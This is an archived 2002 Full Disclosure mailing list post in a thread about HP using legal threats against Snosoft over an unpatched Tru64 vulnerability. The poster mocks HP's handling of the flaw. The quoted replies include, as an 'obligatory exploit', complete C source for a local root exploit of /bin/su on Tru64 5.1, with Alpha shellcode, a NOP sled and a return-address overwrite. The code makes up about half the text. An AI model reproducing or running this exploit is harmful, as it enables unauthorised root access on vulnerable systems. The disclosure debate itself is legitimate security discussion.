Full Disclosure mailing list archives
OT: Snosoft vs HP
From: full-disclosure () lists netsys com (Moyer, Shawn)
Date: Wed, 31 Jul 2002 12:23:01 -0500
I'm looking forward to seeing more of ths novel "why patch when you can sue" approach. Anybody wanna buy a bunch of Alphas? Cheap? Boo, hiss, and poo on HP for this juvenile and moronic approach to dealing with an exposure. As I read the press on this, the vuln has been known since at least spring, yet still no patch, and when the sploit leaks, these idiots unleash the lawyers. How lame. Yes, it leaked through improper channels without a concurrent patch. So? I'm more disgusted with the fact that it's taken HP this long to fix the vuln. I guess the fired all the OSF/1 (sorry, Tru64, puke, puke, whatever) people. I wonder if the Apache Group and Theo's bunch can pull this same swindle. They both got blindsided by improperly released vuln's too, but rather then kvetch and whine and point fingers, they fixed 'em and moved on. "Please save me, DMCA! I've been violated! Waaaaah!" --shawn
-----Original Message----- From: ATD [mailto:simon () snosoft com] Sent: Wednesday, July 31, 2002 11:27 To: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] OT: Snosoft vs HP What is even more interesting is that this issue has been known for quite a while, yet no one did anything about it. Adriel On Wed, 2002-07-31 at 12:22, Len Rose wrote:It's interesting to note that the exploit was removed from SecurityFocus' site. I wonder if HP is going to demand people remove it from all archives everywhere? Obligatory exploit: /* /bin/su tru64 5.1 works with non-exec stack enabled stripey is the man developed at http://www.snosoft.com in the cerebrum labs phased phased at mail.ru */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> char shellcode[]= "\x30\x15\xd9\x43" /* subq $30,200,$16 */ "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */ "\x12\x14\x02\x42" /* addq $16,16,$18 */ "\xfc\xff\x32\xb2" /* stl $17,-4($18) */ "\x12\x94\x09\x42" /* addq $16,76,$18 */ "\xfc\xff\x32\xb2" /* stl $17,-4($18) */ "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */ "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */ "\xfc\xff\x30\xb2" /* stl $17,-4($16) */ "\xf7\xff\x1f\xd2" /* bsr $16,-32 */ "\x10\x04\xff\x47" /* clr $16 */ "\x11\x14\xe3\x43" /* addq $31,24,$17 */ "\x20\x35\x20\x42" /* subq $17,1,$0 */ "\xff\xff\xff\xff" /* callsys ( disguised ) */ "\x30\x15\xd9\x43" /* subq $30,200,$16 */ "\x31\x15\xd8\x43" /* subq $30,192,$17 */ "\x12\x04\xff\x47" /* clr $18 */ "\x40\xff\x1e\xb6" /* stq $16,-192($30) */ "\x48\xff\xfe\xb7" /* stq $31,-184($30) */ "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */ "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */ "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */ "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */ "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */ "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */ "\x38\xff\x7e\xb2" /* stl $19,-200($30) */ "\x13\x94\xe7\x43" /* addq $31,60,$19 */ "\x20\x35\x60\x42" /* subq $19,1,$0 */ "\xff\xff\xff\xff"; /* callsys ( disguised ) */ /* shellcode by Taeho Oh */ main(int argc, char *argv[]) { int i, j; char buffer[8239]; char payload[15200]; char nop[] = "\x1f\x04\xff\x47"; bzero(&buffer, 8239); bzero(&payload, 15200); for (i=0;i<8233;i++) buffer[i] = 0x41; /* 0x140010401 */ buffer[i++] = 0x01; buffer[i++] = 0x04; buffer[i++] = 0x01; buffer[i++] = 0x40; buffer[i++] = 0x01; for (i=0;i<15000;) { for(j=0;j<4;j++) { payload[i++] = nop[j]; } } for (i=i,j=0;j<sizeof(shellcode);i++,j++) payload[i] = shellcode[j]; printf("/bin/su by phased\n"); printf("payload %db\n", strlen(payload)); printf("buffer %db\n", strlen(buffer)); execl("/usr/bin/su", "su", buffer, payload, 0); } _______________________________________________ Full-Disclosure - We believe in it. Full-Disclosure () lists netsys com http://lists.netsys.com/mailman/listinfo/full-disclosure-- ------------------------------------------------------- Secure Network Operations, Inc.| http://www.snosoft.com Cerebrum Project | cerebrum () snosoft com Strategic Reconnaissance Team | recon () snosoft com -------------------------------------------------------
Current thread:
- OT: Snosoft vs HP Len Rose (Jul 31)
- OT: Snosoft vs HP ATD (Jul 31)
- OT: Snosoft vs HP John Scimone (Jul 31)
- OT: Snosoft vs HP Len Rose (Jul 31)
- OT: Snosoft vs HP John Scimone (Jul 31)
- OT: Snosoft vs HP Blue Boar (Jul 31)
- OT: Snosoft vs HP John Scimone (Jul 31)
- <Possible follow-ups>
- OT: Snosoft vs HP Moyer, Shawn (Jul 31)
- OT: Snosoft vs HP Andrew Pinski (Jul 31)
- OT: Snosoft vs HP Tom Perrine (Jul 31)
- OT: Snosoft vs HP Cushing, David (Jul 31)
- OT: Snosoft vs HP Dehner, Benjamin T. (Jul 31)
- OT: Snosoft vs HP Dave Killion (Jul 31)
- OT: Snosoft vs HP Moyer, Shawn (Jul 31)
- OT: Snosoft vs HP ATD (Jul 31)